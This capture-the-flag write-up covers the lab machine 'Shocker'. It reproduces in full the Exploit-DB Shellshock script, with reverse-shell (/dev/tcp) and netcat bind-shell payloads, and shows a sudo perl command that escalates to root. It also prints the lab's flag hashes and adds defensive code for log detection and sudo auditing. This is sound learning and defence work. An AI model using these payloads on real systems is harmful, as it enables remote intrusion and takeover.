
[Machines] [Easy] Shocker: CGI-BIN Shellshock + Perl privilege escalation

Information gathering

IP Address      Open Ports
10.10.10.56     TCP: 80, 2222

$ nmap -p- 10.10.10.56 --min-rate 1000 -sC -sV

PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

CGI-BIN Shellshock

$ dirb http://10.10.10.56/


$ searchsploit -w apache mod_cgi


https://www.exploit-db.com/exploits/34900


#!/usr/bin/env python
# Exploit-DB 34900 (Python 2), as used in this writeup; line breaks and
# indentation restored, behaviour unchanged.
from socket import *
from threading import Thread
import thread, time, httplib, urllib, sys

stop = False
proxyhost = ""
proxyport = 0

def usage():
    print """
Shellshock apache mod_cgi remote exploit

Usage:
./exploit.py var=<value>

Vars:
rhost: victim host
rport: victim port for TCP shell binding
lhost: attacker host for TCP shell reversing
lport: attacker port for TCP shell reversing
pages:  specific cgi vulnerable pages (separated by comma)
proxy: host:port proxy

Payloads:
"reverse" (unix unversal) TCP reverse shell (Requires: rhost, lhost, lport)
"bind" (uses non-bsd netcat) TCP bind shell (Requires: rhost, rport)

Example:
./exploit.py payload=reverse rhost=1.2.3.4 lhost=5.6.7.8 lport=1234
./exploit.py payload=bind rhost=1.2.3.4 rport=1234

Credits:
Federico Galatolo 2014
"""
    sys.exit(0)

def exploit(lhost, lport, rhost, rport, payload, pages):
    # The payload travels in two request headers; mod_cgi exports them as
    # environment variables, which is where the vulnerable bash parses them.
    headers = {"Cookie": payload, "Referer": payload}
    for page in pages:
        if stop:
            return
        print "[-] Trying exploit on : " + page
        if proxyhost != "":
            c = httplib.HTTPConnection(proxyhost, proxyport)
            c.request("GET", "http://" + rhost + page, headers=headers)
            res = c.getresponse()
        else:
            c = httplib.HTTPConnection(rhost)
            c.request("GET", page, headers=headers)
            res = c.getresponse()
        if res.status == 404:
            print "[*] 404 on : " + page
        time.sleep(1)

# Parse key=value arguments.
args = {}
for arg in sys.argv[1:]:
    ar = arg.split("=")
    args[ar[0]] = ar[1]

try:
    args['payload']
except:
    usage()

if args['payload'] == 'reverse':
    try:
        lhost = args['lhost']
        lport = int(args['lport'])
        rhost = args['rhost']
        payload = "() { :;}; /bin/bash -c /bin/bash -i >& /dev/tcp/" + lhost + "/" + str(lport) + " 0>&1 &"
    except:
        usage()
elif args['payload'] == 'bind':
    try:
        rhost = args['rhost']
        rport = args['rport']
        payload = "() { :;}; /bin/bash -c 'nc -l -p " + rport + " -e /bin/bash &'"
    except:
        usage()
else:
    print "[*] Unsupported payload"
    usage()

# Default CGI paths tried when no pages= argument is given.
try:
    pages = args['pages'].split(",")
except:
    pages = ["/cgi-sys/entropysearch.cgi", "/cgi-sys/defaultwebpage.cgi", "/cgi-mod/index.cgi", "/cgi-bin/test.cgi", "/cgi-bin-sdb/printenv"]

try:
    proxyhost, proxyport = args['proxy'].split(":")
except:
    pass

if args['payload'] == 'reverse':
    serversocket = socket(AF_INET, SOCK_STREAM)
    buff = 1024
    addr = (lhost, lport)
    serversocket.bind(addr)
    serversocket.listen(10)
    print "[!] Started reverse shell handler"
    thread.start_new_thread(exploit, (lhost, lport, rhost, 0, payload, pages,))
if args['payload'] == 'bind':
    serversocket = socket(AF_INET, SOCK_STREAM)
    addr = (rhost, int(rport))
    thread.start_new_thread(exploit, ("", 0, rhost, rport, payload, pages,))

buff = 1024
while True:
    if args['payload'] == 'reverse':
        clientsocket, clientaddr = serversocket.accept()
        print "[!] Successfully exploited"
        print "[!] Incoming connection from " + clientaddr[0]
        stop = True
        clientsocket.settimeout(3)
        while True:
            reply = raw_input(clientaddr[0] + "> ")
            clientsocket.sendall(reply + "\n")
            try:
                data = clientsocket.recv(buff)
                print data
            except:
                pass
    if args['payload'] == 'bind':
        try:
            serversocket = socket(AF_INET, SOCK_STREAM)
            time.sleep(1)
            serversocket.connect(addr)
            print "[!] Successfully exploited"
            print "[!] Connected to " + rhost
            stop = True
            serversocket.settimeout(3)
            while True:
                reply = raw_input(rhost + "> ")
                serversocket.sendall(reply + "\n")
                data = serversocket.recv(buff)
                print data
        except:
            pass

$ python2 ./exp.py payload=reverse rhost=10.10.10.56 lhost=10.10.16.14 lport=10032 pages=/cgi-bin/user.sh
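On the detection side, as an added example that is not part of the original writeup and not the exploit's code: a small scanner over Apache "combined" access log lines that flags the Shellshock function-definition prefix `() {` in the Referer and User-Agent fields, plus a direct header check that also covers Cookie. The log lines, the user-agent strings and all function names are constructed for this example.

```python
import re

# Constructed Apache "combined" log lines (sample data, not from the page).
# Line 3 carries the Shellshock function-definition prefix in the Referer
# field against a CGI path; line 4 carries it in User-Agent against a static page.
SAMPLE_LOG = """\
10.10.16.14 - - [01/Jan/2024:10:00:01 +0000] "GET / HTTP/1.1" 200 137 "-" "Mozilla/5.0"
10.10.16.14 - - [01/Jan/2024:10:00:02 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "curl/7.88.1"
10.10.16.14 - - [01/Jan/2024:10:00:03 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 0 "() { :;}; /bin/bash -c id" "Python-urllib/2.7"
10.10.16.14 - - [01/Jan/2024:10:00:04 +0000] "GET /index.html HTTP/1.1" 404 208 "-" "() { ignored; }; echo test"
"""

# Apache LogFormat "combined": host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# The CVE-2014-6271 trigger: a header value that starts a bash function
# definition. Whitespace between "()" and "{" is optional in variants seen.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Combined-format fields that are attacker-controlled request headers.
HEADER_FIELDS = ("referer", "ua")


def parse_combined(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Return findings for one parsed entry (empty list means nothing suspicious)."""
    findings = []
    for field in HEADER_FIELDS:
        if SHELLSHOCK_RE.search(entry[field]):
            findings.append("shellshock-pattern:" + field)
    # A hit against a CGI path is the combination that actually reaches bash.
    if findings and entry["path"].startswith("/cgi-bin/"):
        findings.append("cgi-target")
    return findings


def scan_log(log_text):
    """Scan combined-format log text; return one record per suspicious request."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_combined(line)
        if entry is None:
            continue
        findings = classify(entry)
        if findings:
            hits.append({"ip": entry["ip"], "path": entry["path"],
                         "status": entry["status"], "findings": findings})
    return hits


def check_headers(headers):
    """Inspect raw request headers (what a reverse proxy or WAF sees).

    This also covers Cookie, which the exploit above uses and which the default
    combined log never records, so log-only detection misses that vector.
    """
    return sorted(name for name, value in headers.items()
                  if SHELLSHOCK_RE.search(value))


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
    print(check_headers({"Cookie": "() { :;}; id", "Referer": "() { :;}; id",
                         "User-Agent": "Mozilla/5.0"}))
```

Note the caveat built into `check_headers`: the combined LogFormat records Referer and User-Agent but not Cookie, so the Cookie vector the exploit uses is invisible in a stock access log unless the LogFormat is extended with `%{Cookie}i` or the inspection happens at the proxy.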


User.txt

52bf59994f4a8d97df4daa775641ab05

Privilege escalation

$ sudo -l

$ sudo perl -e 'exec "/bin/sh";'
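The `sudo -l` check above is the one an auditor wants to automate across hosts. As an added example, not part of the original writeup: a parser for `sudo -l` output that flags rules granting a shell-capable interpreter or editor (perl, as used above, among them) with caller-chosen arguments. The sample output, the user name `webuser` and the host name `target` are constructed placeholders; the page shows its real output only as a screenshot.

```python
import os
import re

# Constructed `sudo -l` output for a hypothetical low-privilege account
# (placeholder user/host names; not the page's actual output).
SAMPLE_SUDO_L = """\
Matching Defaults entries for webuser on target:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User webuser may run the following commands on target:
    (root) NOPASSWD: /usr/bin/perl
    (root) /usr/bin/systemctl status apache2
"""

# One rule as printed by `sudo -l`: "(runas) [TAG:]... command [args]"
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S+)(?P<args>.*)$"
)

# Programs that hand the caller an interactive shell when run with
# caller-chosen arguments (perl -e 'exec "/bin/sh"' is the case above).
SHELL_CAPABLE = {"perl", "python", "python2", "python3", "ruby", "sh", "bash",
                 "vi", "vim", "less", "more", "awk", "find", "env"}


def parse_sudo_l(text):
    """Return the command rules from `sudo -l` output as a list of dicts."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        # The Defaults block comes first; rules follow this marker line.
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if m is None:
            continue
        rules.append({
            "runas": m.group("runas").strip(),
            "nopasswd": "NOPASSWD:" in m.group("tags"),
            "cmd": m.group("cmd"),
            "args": m.group("args").strip(),
        })
    return rules


def audit(rules):
    """Flag rules that let the caller reach a shell as the run-as user."""
    findings = []
    for rule in rules:
        base = os.path.basename(rule["cmd"])
        if rule["cmd"] == "ALL":
            reason = "unrestricted command"
        elif base in SHELL_CAPABLE and rule["args"] == "":
            # An argument-restricted rule (e.g. a fixed script path) is
            # not flagged here; only the wide-open form is.
            reason = "shell-capable program with caller-chosen arguments"
        else:
            continue
        findings.append({"cmd": rule["cmd"], "runas": rule["runas"],
                         "nopasswd": rule["nopasswd"], "reason": reason})
    return findings


if __name__ == "__main__":
    for finding in audit(parse_sudo_l(SAMPLE_SUDO_L)):
        print(finding)
```

The mitigation the audit points at is the usual one: grant a fixed script (with arguments pinned in the rule) rather than the interpreter itself, since any rule ending in a bare interpreter path is equivalent to granting a shell.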


Root.txt

0bc6d190e24dca08e42174ed7a7ad1a7
